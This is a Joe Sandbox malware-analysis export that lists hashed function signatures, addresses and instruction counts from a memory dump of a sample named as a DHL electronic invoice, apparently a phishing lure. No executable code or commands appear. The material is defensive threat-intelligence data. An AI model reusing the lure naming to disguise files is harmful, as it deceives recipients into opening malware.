Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9337e9b8f67eb8e4f1a475c96dba07896388278a021da9c2f6be22bb9d0c1f
Instruction ID: 4a8c71a372b21e65a9dd3f99a234915ae4f091f375f3db9374475eb09dfe4910
Opcode Fuzzy Hash: 4c9337e9b8f67eb8e4f1a475c96dba07896388278a021da9c2f6be22bb9d0c1f
Instruction Fuzzy Hash: 2D11BF31700611ABEB11CF8DC4C0E26BBE9AF8A751B19806DEE0C9F204D6B2D901C790

Uniqueness

Uniqueness Score: -1.00%

Function 0197AAEE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction ID: 0af0d1bdf6ff6cb32d0b59b5a65a68cde9fa55d01fa54083adc22afeda36f47b
Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction Fuzzy Hash: FE216872600641DFD7218F49C940E7ABBEAEFD4B51F19882EE94E97620C730ED01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 019480E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4e23888959ef1473bad3a0efe67b77340e914761112cd18d34c43374b2c502
Instruction ID: b534e75fbaf399ed4555cc72543fe3a54838113475ec341d12b3cc0ebd01ba8b
Opcode Fuzzy Hash: 2d4e23888959ef1473bad3a0efe67b77340e914761112cd18d34c43374b2c502
Instruction Fuzzy Hash: EE219F35A00205DFCB14CF98C581E6EBBB5FB88314F20456ED109A7311D771AD46CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0197674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd36b5baa6bca642e25454c0f1e26abcf2e2e4f05a0f48fae559ad9ade1fa53e
Instruction ID: 90ad346ffb7952f0376196eddbd69d84951d5f7b5e77bb17b6f86e61ea8d4f07
Opcode Fuzzy Hash: fd36b5baa6bca642e25454c0f1e26abcf2e2e4f05a0f48fae559ad9ade1fa53e
Instruction Fuzzy Hash: 39216A75610B01EFE7218F68C881FA6B7E8FF84390F44882DE59EC7251DA30A940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0196E8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fea634c4bc4c3e5eaa0bc8fd300167e95e80127533abdcc352404d5d8f3a2e0
Instruction ID: 97b83b1d41de18880cd09fe77c6e1a88755318631d4c554fcf9161587390b17e
Opcode Fuzzy Hash: 4fea634c4bc4c3e5eaa0bc8fd300167e95e80127533abdcc352404d5d8f3a2e0
Instruction Fuzzy Hash: 98110C367041149BCB1ADB29CC41A6F726AEFD53B4B65452DE92E9B250E9309D02C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 019D6870 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421f5bb7d8e1775a5faf0101572e8aaea4a196d60dff888371b54f5617407f4b
Instruction ID: befc108ec3e0cdd8d9a2b0deef767087343e644780567247ada9d366dfde65d6
Opcode Fuzzy Hash: 421f5bb7d8e1775a5faf0101572e8aaea4a196d60dff888371b54f5617407f4b
Instruction Fuzzy Hash: C511C632240614EFD722DF6DCD40F9A77ACEF99751F118025F609DB261DA70E905C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 019766B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b64dd40b146ebd80e5cbc123509030905a76d021a2b0108399ce503568047ef
Instruction ID: c64369102f4393918065aea6d869ac85f7eeaf8094b8bf8bdec162e0ff87aec1
Opcode Fuzzy Hash: 3b64dd40b146ebd80e5cbc123509030905a76d021a2b0108399ce503568047ef
Instruction Fuzzy Hash: AA118F76A01745EFDB25CF59C980E5AFBF8AF94690F154079E90DAB311E630DE01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A0A8E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction ID: 0b14520fa25f6784c7cfc42d10c47703e7112fe77269d9a3bac371221dfd6784
Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction Fuzzy Hash: F211C836A00915AFDB19CB54C805B9EB7F5EF84350F054269EC55D7380D675BE51CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01940AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction ID: faea5ecb57f0832c5b0400911b5e9c48aeb118fe971caca3360e107903b24953
Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction Fuzzy Hash: 852106B5A00B459FD3A0CF29C440B56BBF4FB48B10F10492EE98AC7B50E371E814CB94

Uniqueness

Uniqueness Score: -1.00%

Function 019CE7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: ead17cc3da2ce12dfecde30c5b7bbcceb93f5f6e341b10a34a7b4ba710d7485a
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: 11119131601601EFE7219F48C840F5B7FA9EB85F55F05842CEA8E9B260D731DC40D792

Uniqueness

Uniqueness Score: -1.00%

Function 019627ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 714de6a45a8f861efedd6dfbc35b8c8d7e80726c9b6dac57b8734ef2e3f20a82
Instruction ID: 78f3cb7375e4b5788049093f832f992c38a11bde649e43016bf71d18f78144f6
Opcode Fuzzy Hash: 714de6a45a8f861efedd6dfbc35b8c8d7e80726c9b6dac57b8734ef2e3f20a82
Instruction Fuzzy Hash: 0D010031606686ABE326A36E9C88F277B9CEF80795F490065F9099B240DA24DC00C2F2

Uniqueness

Uniqueness Score: -1.00%

Function 01944690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be48140b5689a0c2cdb69a40a3d7916ad1ced68a6e44b69356f4f896214a9c0
Instruction ID: 954046ef489533b7a18abc990601b028c22e3d5255dec1f3522db40d15bf77aa
Opcode Fuzzy Hash: 2be48140b5689a0c2cdb69a40a3d7916ad1ced68a6e44b69356f4f896214a9c0
Instruction Fuzzy Hash: B611E136241645AFDB26CF5DD940F567BA8EB86B69F00452AFA0C9B350C370E842CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01976620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef809955d45d00df8172a44b10f02a1ff1dbd0dabc834b6de26ad34b3ccda471
Instruction ID: b98cbc43063eff84bbfb695cf08662333e6af1f0f30dd029040ed4c7b9d49c78
Opcode Fuzzy Hash: ef809955d45d00df8172a44b10f02a1ff1dbd0dabc834b6de26ad34b3ccda471
Instruction Fuzzy Hash: 31118676900B15ABEB21EF59D980F5EFBB8EF84751F910459DA09B7200D730AD018B50

Uniqueness

Uniqueness Score: -1.00%

Function 0196EA2E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db126b229a20cd62b23421d96bfe7fce9feb06d757db513cc199909dc2e9d44
Instruction ID: 9a974ac936701a12eca98892502c3d9a162f5f980f1f563117280884a7aed91b
Opcode Fuzzy Hash: 7db126b229a20cd62b23421d96bfe7fce9feb06d757db513cc199909dc2e9d44
Instruction Fuzzy Hash: D20180799001099FD725DB1DD848F26BBEDEBD5319F20816AF1098B260C770DC46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0196E53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: e879119dc33f8b7d0c383b9852558e82c2be802e6910b74b57a3aec2feeb907b
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: 0211E9752016C59BEB23D71CC554B6977ACEB80785F1904A1ED4D97652F328C946C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 019CE75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: e44cb300303c143574b56687ca1c83ca5883a90b9092a7fe734b8a65ae1199fe
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: 06019232600105AFEB21DF58C801F5A7EADEB85F55F058428EA8E9B260E771DD40C791

Uniqueness

Uniqueness Score: -1.00%

Function 0193A250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: 336f968d334e7c174b103cbf450c9e139d0c7ad0e04432fe3107af0f114cebe2
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: 4A0126354047219BCB318F19D840A367BE9EF957617008A2DFCDDCB281C335D400CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019BE1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb380a067ff911a02bb146fc96abe1cd03c0ca0b304092f886953e22101ceccd
Instruction ID: 867c23b1a6d9a3d0c649edcbbefe004c83816d47a25a5b1d6e5b9c5557c921dc
Opcode Fuzzy Hash: fb380a067ff911a02bb146fc96abe1cd03c0ca0b304092f886953e22101ceccd
Instruction Fuzzy Hash: AE11A132241241EFDB15EF19CD80F967BB8FF94B44F200065FD099B651C235ED01CA90

Uniqueness

Uniqueness Score: -1.00%

Function 01946259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a9137d96746aaca1b09f3a7134da7b466747de9e7f01643222d1dbf6fa2e20
Instruction ID: 708f414abb5001640cec628ab9a8499b469ed7109f31e838c1e7d326cb9cb90c
Opcode Fuzzy Hash: 33a9137d96746aaca1b09f3a7134da7b466747de9e7f01643222d1dbf6fa2e20
Instruction Fuzzy Hash: 7D115A71642229ABDB25EF64CC42FE9B3B8AF45710F504194A31CA60E0DB709E81CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0194208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: 337d075bc42a86ef28265486efca6e8e36c51f94658fb2a95110357959946c45
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: 0701F5326002008BEF159B1DE880F92BBAABFD4700F1545A5FD09CF246EA71C881C390

Uniqueness

Uniqueness Score: -1.00%

Function 019C6050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a206224dd59282bae84e2c6553b52cf7a427ef4b78431a4d49668473f5ab16bf
Instruction ID: 3d8b79b30d392473f98b0a2e418ea8c7e84748c75b3ec5f5e76320a42d716fc4
Opcode Fuzzy Hash: a206224dd59282bae84e2c6553b52cf7a427ef4b78431a4d49668473f5ab16bf
Instruction Fuzzy Hash: 22112D77900019BBCB11DB95CC84DDF7B7CEF48254F044166E90AE7211EA34EA15CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 019D6500 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13395eeb40c37b6aedb0dd1d8cf82932622f69474ffcc57d5c5b0c311f514432
Instruction ID: 25d678d61562f717d2dc255dee6ae8a0d2348938c08e974405b7259130b90477
Opcode Fuzzy Hash: 13395eeb40c37b6aedb0dd1d8cf82932622f69474ffcc57d5c5b0c311f514432
Instruction Fuzzy Hash: 2711A1366441469FD711CF58D800BA6BBB9FB9A314F48C159E8498B316D732EC85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019CC810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87b46a42ce149f89b3bd5266660506c98e2f45e61e630bdc3b1be74b9fcfd0b2
Instruction ID: cbb3468cf1a915b969803ae0ecf84e3bdd2d3ee729343a25b775d9f1e11c4017
Opcode Fuzzy Hash: 87b46a42ce149f89b3bd5266660506c98e2f45e61e630bdc3b1be74b9fcfd0b2
Instruction Fuzzy Hash: 3B11E8B1E002199BCB04DFA9D541AAEBBF8FF58750F10406AB909E7351D674EA018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 019EEA60 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4d2867373de0e44b6f3957b3af013cf2b2f24b89681432661c7ef19bd6703b8
Instruction ID: 67f9c11cde9be6cfa78e4ff9f24fadffd2d4cde54037ffef280efd7b80b11c74
Opcode Fuzzy Hash: f4d2867373de0e44b6f3957b3af013cf2b2f24b89681432661c7ef19bd6703b8
Instruction Fuzzy Hash: 05017131540211ABCB33EF19C448E76BBEDFF92695B45442EE94E6B611CB219C42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019820F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdbbeddb31829f24135fd366bd93297aa2a1d8e0c4279f67f4d832513210586
Instruction ID: f1bca5e9684f6494c5fc096fcf398c49ee279f3f6534ea1f51fbdf86e98d9deb
Opcode Fuzzy Hash: ecdbbeddb31829f24135fd366bd93297aa2a1d8e0c4279f67f4d832513210586
Instruction Fuzzy Hash: 19118075A0120DAFCB05EFA4C851FAE7BBAFF84740F104059F90A97290E635EE11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0193C020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: 9eccc6d3b3a8f41f71e771598f2598506285ad89debea7cf5b17bf331cba8d8c
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: 7801F932100B459FEF229AAEC440E67B7EDFFC5350F04481AA59A87544DA70F401C761

Uniqueness

Uniqueness Score: -1.00%

Function 0197E5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9be260a2f88bfc0d41a9e6464c7883909d24d1959ec92cbbb742e9fce7e08d0c
Instruction ID: 24a2566cfa9be89d686330d3763857134a1cf1361cd69985a449a1018f9aed09
Opcode Fuzzy Hash: 9be260a2f88bfc0d41a9e6464c7883909d24d1959ec92cbbb742e9fce7e08d0c
Instruction Fuzzy Hash: E60184B1611505BFD351AB69CD80E57BBACFFD9694B000525BA0D93551DB24EC01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 019D69C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cffd14ed4b167bc85b17382951473674ae96415f7e048a2bae4c27fa6f37e4f
Instruction ID: 0105587dddefa0b662c27f91e301705c4fcd12b0e5aa83aec72b9c6989dbef69
Opcode Fuzzy Hash: 7cffd14ed4b167bc85b17382951473674ae96415f7e048a2bae4c27fa6f37e4f
Instruction Fuzzy Hash: B401FC322142129BD320EF6AC849AA7BBACFF98760F118529F99D87180E730D905C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 019CC460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966c338b9cb44bfc548fef3f1ef8f78fba50554016d4fb0815d1739842ca639f
Instruction ID: 8c4bb705253a7d85c6d4aa51cc70eb78808490e2cd3b13bab723b5a60bda5bae
Opcode Fuzzy Hash: 966c338b9cb44bfc548fef3f1ef8f78fba50554016d4fb0815d1739842ca639f
Instruction Fuzzy Hash: 0E115E75A0020DABDB15EF64C851EAEBBB9EF88B40F008059FD4997380DA34D911CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019CC97C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffef37f68ba1582d156bdd6fd3d5107b95b8217b6ebea17c3d3f93ef0dc81a16
Instruction ID: d01633377ee78054c6a12a9860e5c95fa96a8f766ffa5a3d677ec610243b0f83
Opcode Fuzzy Hash: ffef37f68ba1582d156bdd6fd3d5107b95b8217b6ebea17c3d3f93ef0dc81a16
Instruction Fuzzy Hash: 9A1139B16183099FC700DF69D442A9BBBE8EF98750F00491EB998D7391E630E901CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01A14A80 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
Instruction ID: b5e4061fd305c04a3e3c086df77e8cf942c399a4866e0f8845671f7a3d352b88
Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
Instruction Fuzzy Hash: 5301D433200A059FE721DB6DD844F96BBEAFBCA710F094819E6428B658DBB0F841C794

Uniqueness

Uniqueness Score: -1.00%

Function 019CCA11 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf246d0ecdc3a980b4f892c5629a6ae2afaf550c58f7186235b8d48580784927
Instruction ID: cb83ad54686fffd86b053fff58f268a4b20c3bee04b4bbe4a011d6b97ad135d3
Opcode Fuzzy Hash: bf246d0ecdc3a980b4f892c5629a6ae2afaf550c58f7186235b8d48580784927
Instruction Fuzzy Hash: B1113C716143059FC710DF6DD445A5BBBE8FF99750F00451EB998D7350E630E901CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0195E016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: ba6e7a79d3f11e12ed9b69f61eeee777aeb4ab0531c5cb28a5872024a3e25f22
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: 39017C32204580DFE722CA2DC948F36BBECEB84755F0904A5F90DDB691D629DE40C721

Uniqueness

Uniqueness Score: -1.00%

Function 0193826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27be34eb6a7794242250e6cfa355750e35f5828063952c135dab9ccfa863b499
Instruction ID: 1c05e0d4f2d906f4a15cc4c6e60e7f5aac812e309ac33140b991e753aef17c51
Opcode Fuzzy Hash: 27be34eb6a7794242250e6cfa355750e35f5828063952c135dab9ccfa863b499
Instruction Fuzzy Hash: B4018F31B10609EBDB14EB6ADC05AAAB7EDEFC0650B154129B909A7644EE20D902C692

Uniqueness

Uniqueness Score: -1.00%

Function 019EEB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
